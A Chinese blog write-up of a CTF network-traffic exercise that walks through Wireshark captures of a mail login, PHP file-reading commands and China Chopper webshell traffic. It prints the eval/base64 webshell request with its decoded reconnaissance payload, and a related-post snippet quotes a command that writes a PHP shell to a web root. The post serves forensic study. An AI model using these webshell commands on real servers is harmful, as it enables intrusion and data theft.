ctf流量分析练习一

最新推荐文章于 2024-04-19 15:00:23 发布
最新推荐文章于 2024-04-19 15:00:23 发布
阅读量3.8k 收藏 6
点赞数 1
分类专栏: # CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44108455/article/details/108146631
版权

最近在学习流量分析这块的内容,找到一篇不错的文章,就准备复盘一下。

原文链接:https://www.freebuf.com/column/169738.html

问题一

打开这个流量包,大致分析一下是一个邮箱请求登陆的一个流量包,一眼就看见了 user和pass,需要base64解密一下即可。
在这里插入图片描述base64解密地址:https://base64.supfree.net/

username:test@51elab.com
password:FLAG:ISCCTESTpas

flag就藏在password里

问题二

随意的追踪一个tcp流就发现了flag,可是这是我一直不太明白的,拿到一个流量包,如何判断追踪那个流呢?
在这里插入图片描述

问题三

切换至http进行查看
在这里插入图片描述
发现大量数据爆破,猜想是黑客进行扫描
浏览之后,发现最后存在可疑操作
在这里插入图片描述
黑阔执行phpinfo成功
于是开始执行下面两句话:

print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXgucGhw%22))));
print_r(gzcompress(file_get_contents(base64_decode(%22ZmxhZy50eHQ%22))));

将上面两句话中进行操作的文件进行base64解密
注意:%22 是 双引号的url编码,要去掉之后再解码,才可以得到正确的文件名
index.php
flag.txt
我们切换至原始数据,提取flag.txt的gz压缩二进制内容
这里我卡了好久,不过最终还是整明白了,找到了flag.txt的gz压缩二进制内容,这里多亏了这个文章:
https://blog.csdn.net/chrycoder/article/details/86525316
看了这个文章大致就明白了,我就简单截个图说一说就好了

我的理解:
黑阔在这里把flag.txt中的内容进行读取,并进行gz压缩
然后我们可以确定压缩的ascii内容如下
在这里插入图片描述切换到原始数据,发现下面全变成了二进制代码,于是要去找那个gz压缩的二进制代码到底是哪个,这时就用到了010Editor
在这里插入图片描述点击save as 为1.tar.gz,再用010Editor打开,对照右边的内容去确定二进制到底要选那一段,最终确定如下:
在这里插入图片描述得到flag.txt的gz压缩二进制内容

789ccbc82c492e49abb6304d32484c354eb4483437b048b234324f4a334c343648494b334e36333531a8e5020018cb0c6c

保存成文件
然后写脚本进行解压缩

    php
    <?php 
    $a = gzuncompress(file_get_contents('./1'));
    echo $a;
     ?>

按照这个脚本我并没有搞成功,尝试对字符串直接压缩也不可以,无奈,先跳过块了,说不定之后会找到症结所在。。

问题四

同样,我们先查看http流量
在这里插入图片描述发现有人不断向/uploads/dvwa.php提交post数据
怀疑这里存在一句话木马,于是追踪tcp流
在这里插入图片描述发现端倪,这里有个cmd,url解码
在这里插入图片描述也就是:

cmd=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

对z0进行base64解码,如下:

 @ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/")
{
foreach(range("A","Z") as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}
$R.="\t";
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("|<-");
die();

发现大多都是中国菜刀的流量,遍历查看所有黑客操作,
使用tcp.stream eq x x代表一个数字
在tcp stream 5和6发现了猫腻
tcp.stream eq 5
在这里插入图片描述

gclome
关注
专栏目录
CTF中的网络流量分析:工具、技术与实战案例
weixin_65409651的博客
08-26 1127
网络流量分析是一项通过捕获和检查网络数据包来解析网络活动的技术。分析者可以识别网络中的恶意活动、异常行为或数据泄露等问题。网络流量分析CTF竞赛中常用于重建网络攻击过程、提取敏感数据、识别命令与控制(C2)通信等任务。
流量分析练习2
qq_45766280的博客
08-27 625
流量分析2题解 题目:1.pcap 题解 这个文件不小,初步推断这次的会话会有文件传输里面应该会有文件,扔进binwalk里试了一下,没有什么东西。只能老老实实的做流量分析了。 wireshark中一个功能——统计,可以对包的大小、协议进行归类并统计。 统计->conversation,并对内容大小进行排序 可以看到有两个比较大的包,选择一个包并点击下面的Follow Stream...追踪流。第一个包里面没有什么实用的信息,让我们来看看第二个包 这个包里面有几个比较重要的信息,第一个就是这个包
Wireshark流量分析
12-17
用于网络安全流量分析的工具,可以配合burpsuite抓包工具一块使用
CTF流量分析
热门推荐
shy的博客
06-05 2万+
CTF杂项中存在一种题型——流量分析,主要是给你一个流量包,让你分析获取其中的flag的值。 有5种方式,可以直接查找flag。 1、直接搜索 2、使用notepad++等软件,直接打开流量包,搜索关键字 3、编写python脚本 #encoding:utf-8 #用二进制方式读取文件 file=open("networking.pcap","rb") #读取文件内容 i=file.read() #查找字段 a1=i.find("flag{") a2=i.find("}",a1) #将查
关于流量分析题目的解析
TJHder的博客
03-19 1909
展示一部份吧,我们将它先利用hex转化为ascii,然后这个是一个埃及文,意思是说要进行一个zip文件格式的保存然后利用notepad++进行一个ascii的转换即可得到一个docx(word文档),里面就有flag!我们将这个字节流保存下来,然后用工具发现它是一个jpg格式的图,于是以jpg的格式进行保存下来于是我们就可以看到密码是多少,然后我们将这个密码带入进去就可以得到我们需要的flag。先在kali里面用弱口令去进行爆破,然后将密码带入并生成一个1.pcap的文件打开后,查找http协议的即可。
流量分析练习
w_g3366的博客
08-10 1157
流量分析实例 一、远控抓包分析 使用C++编写基于TCP协议通信的客户端和服务端程序。 将服务端编译好放到虚拟机,将客户端在真机上编译好。 虚拟机运行Wireshark编写捕获过滤器:tcp and port 1234开始捕获 运行虚拟机的服务端,运行真机的客户端,观察Wareshark(识别三次握手) 在客户端输入一些内容,观察Wareshark 在客户端输入quit观察Wireshark(识...
练习流量分析DAY1
qq_63574533的博客
11-15 394
ctf的杂项相关练习,方法学习了b站风二西大佬的视频!真的很有用!爱大佬QWQ!
练习流量分析DAY2
qq_63574533的博客
11-15 180
ctf的杂项相关练习,方法学习了b站风二西大佬的视频!真的很有用!爱大佬QWQ!
两道CTF流量分析题分享
seek_2022的博客
03-10 2351
本文分享了两道CTF流量分析题,分析的过程充满着许多乐趣,希望本文分享的两道题的分析对大家学习相关技能有帮助。
流量分析ctf
m0_53067332的博客
01-10 8266
题目介绍 该题为流量分析,当黑客入侵我们的网络是,我们可以需要通过一系列分析操作来进行抓捕与追踪,本题目难度中等偏下,不是很有难度,但题目类型较为全面,适合入手当做练习。 一、题目背景 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个不同类型的题目,旨在帮助学习者提升Web安全攻防能力。 **入门第一部分** 1. **bugku-ctf 第一题:成绩单** 这个题目可能...
ctf php 流量分析题,2020天津市ctf大赛之usb数据包流量分析
weixin_35949064的博客
03-09 633
1.鼠标流量分析1.常用命令tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt如果提取出来的数据有空行,可以将命令改为如下形式:tshark -r usb2.pcap -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt如果提取出来的数据没有冒号,可以用脚本来加上冒...
CTF——MISC习题讲解(流量分析winshark系列~三)
tlovejr的博客
03-16 4835
CTF——MISC习题讲解(流量分析winshark系列~三) 前言 上一章节我们已经做完一场流量分析杂项题目,接下来继续给大家讲解流量分析系列三。 一、ssl流量 首先打开题目得到两个文件,一个是log结尾的文件,另一个就是正常的流分包TLSv1.3都是经过加密的流量,所以我们第一步就应该解密,首先在我们文件里有一个解密的东西,我们进行导入 点击 编辑->首选项-> 然后需要我们把题目中自带的文件直接导入进去看看 导入完后就有http的协议 然后就发现有了flag的字眼 然后就直接TLS流
有关流量分析和内存取证的
xiao_xianyu123的博客
01-09 4967
1.流量分析   网络流量分析是指捕捉网络中流动的数据包,并通过查看包内部数据以及进行相关的协议、流量分析、统计等来发现网络运行过程中出现的问题。   CTF比赛中,通常比赛中会提供一个包含流量数据的 PCAP 文件,进行分析。 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可) 3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:usernam
流量分析题(持续更新)
zip471642048的博客
05-16 3342
wireshark 题目链接:https://ce.pwnthebox.com/challenges?id=1132 黑客通过wireshark抓到管理员登陆网站的一段流量包(管理员的密码即是答案) 根据题目描述我们筛选出http流量 查看返回的response ftp 题目链接 : https://ce.pwnthebox.com/challenges?id=183 搜索字符串flag发现ftp曾上传或下载了一个flag.txt的文件 ftp-data是ftp传输过程中数据的协议,筛选ftp-d
CTF流量分析
Kiber
04-19 399
思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件。
Wireshark流量分析例题
求大佬师傅带
08-23 3126
Wireshark流量分析例题
CTF流量分析1
qq_45766280的博客
08-26 940
流量分析1题解:总结 仅作为学习笔记使用 题目:Q3.pcap 题解: 先在wireshark里看一下 有HTTP先看HTTP,直接在过滤器中选择HTTP 这些包就有意思了,这些请求有些想目录扫描在不断的请求,而大部分的回应都是404,那么我们暂时推断会有访问成功的,往后面找找吧。 这两个语句成功通过了,那我们来详细分析分析这两个包。追踪流->HTTP GET /?c=print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXguc
ctf流量分析arp
最新发布
05-30
CTF流量分析ARP是指在网络安全比赛中,通过分析ARP协议的流量来获取关键信息,以便攻击或保护目标系统。ARP协议是用于将IP地址映射到物理地址的协议,通过分析ARP流量可以获得网络拓扑结构、IP地址和MAC地址的对应关系等信息。在CTF比赛中,通过分析ARP流量可以识别出恶意主机、欺骗攻击等安全问题,进而采取相应措施保护系统安全。 相关问题: 1. 什么是ARP协议? 2. ARP协议有哪些作用? 3. 如何防止ARP欺骗攻击? 4. 什么是网络拓扑结构?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值